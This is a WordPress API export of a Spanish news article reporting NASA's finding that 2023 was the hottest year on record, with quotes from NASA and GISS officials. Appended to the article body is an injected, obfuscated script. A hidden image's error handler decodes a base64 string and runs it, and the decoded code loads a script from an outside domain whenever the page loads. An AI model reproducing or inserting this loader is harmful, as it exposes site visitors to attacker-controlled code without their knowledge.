{"id":7812,"date":"2024-01-15T10:30:46","date_gmt":"2024-01-15T13:30:46","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=7812"},"modified":"2025-08-13T15:48:33","modified_gmt":"2025-08-13T18:48:33","slug":"la-nasa-advirtio-que-el-planeta-se-encuentra-en-crisis-climatica","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=7812","title":{"rendered":"La NASA advirti\u00f3 que el planeta se encuentra en \u00abcrisis clim\u00e1tica\u00bb"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-background\" style=\"background-color:#4cb6f3\"><em>El a\u00f1o pasado la temperatura promedio de la superficie de la Tierra super\u00f3\u00a0por 1,2 grados los valores de referencia. \u00abDesde calor extremo, a incendios forestales, hasta el aumento del nivel del mar, podemos ver que nuestra Tierra est\u00e1 cambiando\u00bb, dijo\u00a0el administrador del organismo, Bill Nelson.<\/em><\/h4>\n\n\n\n<p>La NASA advirti\u00f3 que el planeta se encuentra en&nbsp;<strong>\u00abcrisis clim\u00e1tica\u00bb<\/strong>&nbsp;ya que&nbsp;<strong>en 2023 la temperatura promedio de la superficie de la Tierra fue la m\u00e1s c\u00e1lida que se haya registrado<\/strong>, superando por 1,2 grados los valores de referencia, informaron cient\u00edficos del Instituto Goddard de Investigaciones Espaciales Nueva York (GISS, en sus siglas en ingl\u00e9s), Estados Unidos.<\/p>\n\n\n\n<p>\u00abEl informe de la temperatura global de la NASA y de la Oficina Nacional de Administraci\u00f3n Oce\u00e1nica y Atmosf\u00e9rica (NOAA en sus siglas en ingl\u00e9s) confirma lo que miles de millones de personas alrededor del mundo experimentaron el a\u00f1o pasado: estamos frente a una crisis clim\u00e1tica\u00bb, dijo el administrador de la NASA Bill Nelson en una publicaci\u00f3n del sitio web del organismo.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-rich is-provider-twitter wp-block-embed-twitter\"><div class=\"wp-block-embed__wrapper\">\n<blockquote class=\"twitter-tweet\" data-width=\"550\" data-dnt=\"true\"><p lang=\"es\" dir=\"ltr\">El 2023 fue el a\u00f1o m\u00e1s c\u00e1lido en los registros de la NASA por un amplio margen, continuando una tendencia de calentamiento a largo plazo provocada por actividades humanas, en particular las emisiones de gases de efecto invernadero. Aprende m\u00e1s: <a href=\"https:\/\/t.co\/JckbSooWKf\">https:\/\/t.co\/JckbSooWKf<\/a> <a href=\"https:\/\/t.co\/tvfTt9iM74\">pic.twitter.com\/tvfTt9iM74<\/a><\/p>&mdash; NASA en espa\u00f1ol (@NASA_es) <a href=\"https:\/\/twitter.com\/NASA_es\/status\/1745864842425114794?ref_src=twsrc%5Etfw\">January 12, 2024<\/a><\/blockquote><script async src=\"https:\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script>\n<\/div><figcaption class=\"wp-element-caption\">\u00ab<strong>Desde calor extremo, a incendios forestales, hasta el aumento del nivel del mar, podemos ver que nuestra Tierra est\u00e1 cambiando<\/strong>. La NASA seguir\u00e1 utilizando nuestra posici\u00f3n estrat\u00e9gica en el espacio para traer a la Tierra datos clim\u00e1ticos cr\u00edticos que sean comprensibles y accesibles para todas las personas\u00bb, agreg\u00f3.<br><br>En 2023, de junio a diciembre se estableci\u00f3 un r\u00e9cord mundial de altas temperaturas para cada mes.\u00a0Julio fue el mes m\u00e1s caluroso jam\u00e1s registrado y, en general, la Tierra fue alrededor de 1,4 grados m\u00e1s calurosa en 2023 que el promedio de finales del siglo XIX, cuando comenz\u00f3 el mantenimiento de los registros modernos.<\/figcaption><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\"><em><mark class=\"has-inline-color has-vivid-cyan-blue-color\">En 2023, de junio a diciembre se estableci\u00f3 un r\u00e9cord mundial de altas temperaturas para cada mes<\/mark><\/em><\/h4>\n\n\n\n<p>\u00abEl calentamiento excepcional que estamos experimentando no es algo que hayamos visto en la historia de la humanidad\u00bb, afirm\u00f3 Gavin Schmidt, director del GISS, y aclar\u00f3 que \u00abse debe principalmente a nuestras emisiones de combustibles f\u00f3siles, y estamos observando sus impactos en las olas de calor, las lluvias intensas y las inundaciones costeras\u00bb.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.telam.com.ar\/thumbs\/bluesteel\/advf\/imagenes\/2023\/11\/65689ada2026f_1200.jpg\" alt=\"\" \/><figcaption class=\"wp-element-caption\"><br>Foto: AFP<\/figcaption><\/figure>\n\n\n\n<p>En mayo de 2023, el oc\u00e9ano pas\u00f3 de La Ni\u00f1a a El Ni\u00f1o, lo que a menudo coincide con los a\u00f1os m\u00e1s calurosos en los registros.<\/p>\n\n\n\n<p>Sin embargo, las temperaturas r\u00e9cord en la segunda mitad de 2023 ocurrieron antes del pico del actual fen\u00f3meno de El Ni\u00f1o, por lo que los cient\u00edficos esperan observar los mayores impactos de El Ni\u00f1o en febrero, marzo y abril.<\/p>\n\n\n\n<p>\u00abEl a\u00f1o r\u00e9cord de 2023 subraya la importancia de tomar medidas urgentes y continuadas para hacer frente al cambio clim\u00e1tico\u00bb, declar\u00f3 Pam Melroy, administradora adjunta de la NASA.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/www.telam.com.ar\/notas\/202401\/652398-nasa-crisis-climatica.html\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"1024\" height=\"103\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-1024x103.jpeg\" alt=\"\" class=\"wp-image-7468\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-1024x103.jpeg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-300x30.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-768x77.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-696x70.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-320x32.jpeg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-480x48.jpeg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-800x80.jpeg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_.jpeg 1067w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><figcaption class=\"wp-element-caption\">Fuente:<\/figcaption><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El a\u00f1o pasado la temperatura promedio de la superficie de la Tierra super\u00f3\u00a0por 1,2 grados los valores de referencia. \u00abDesde calor extremo, a incendios forestales, hasta el aumento del nivel del mar, podemos ver que nuestra Tierra est\u00e1 cambiando\u00bb, dijo\u00a0el administrador del organismo, Bill Nelson. La NASA advirti\u00f3 que el planeta se encuentra en&nbsp;\u00abcrisis clim\u00e1tica\u00bb&nbsp;ya [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":7813,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[29],"tags":[],"class_list":["post-7812","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-datos-utiles"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7812","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7812"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7812\/revisions"}],"predecessor-version":[{"id":10232,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7812\/revisions\/10232"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/7813"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7812"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7812"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7812"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}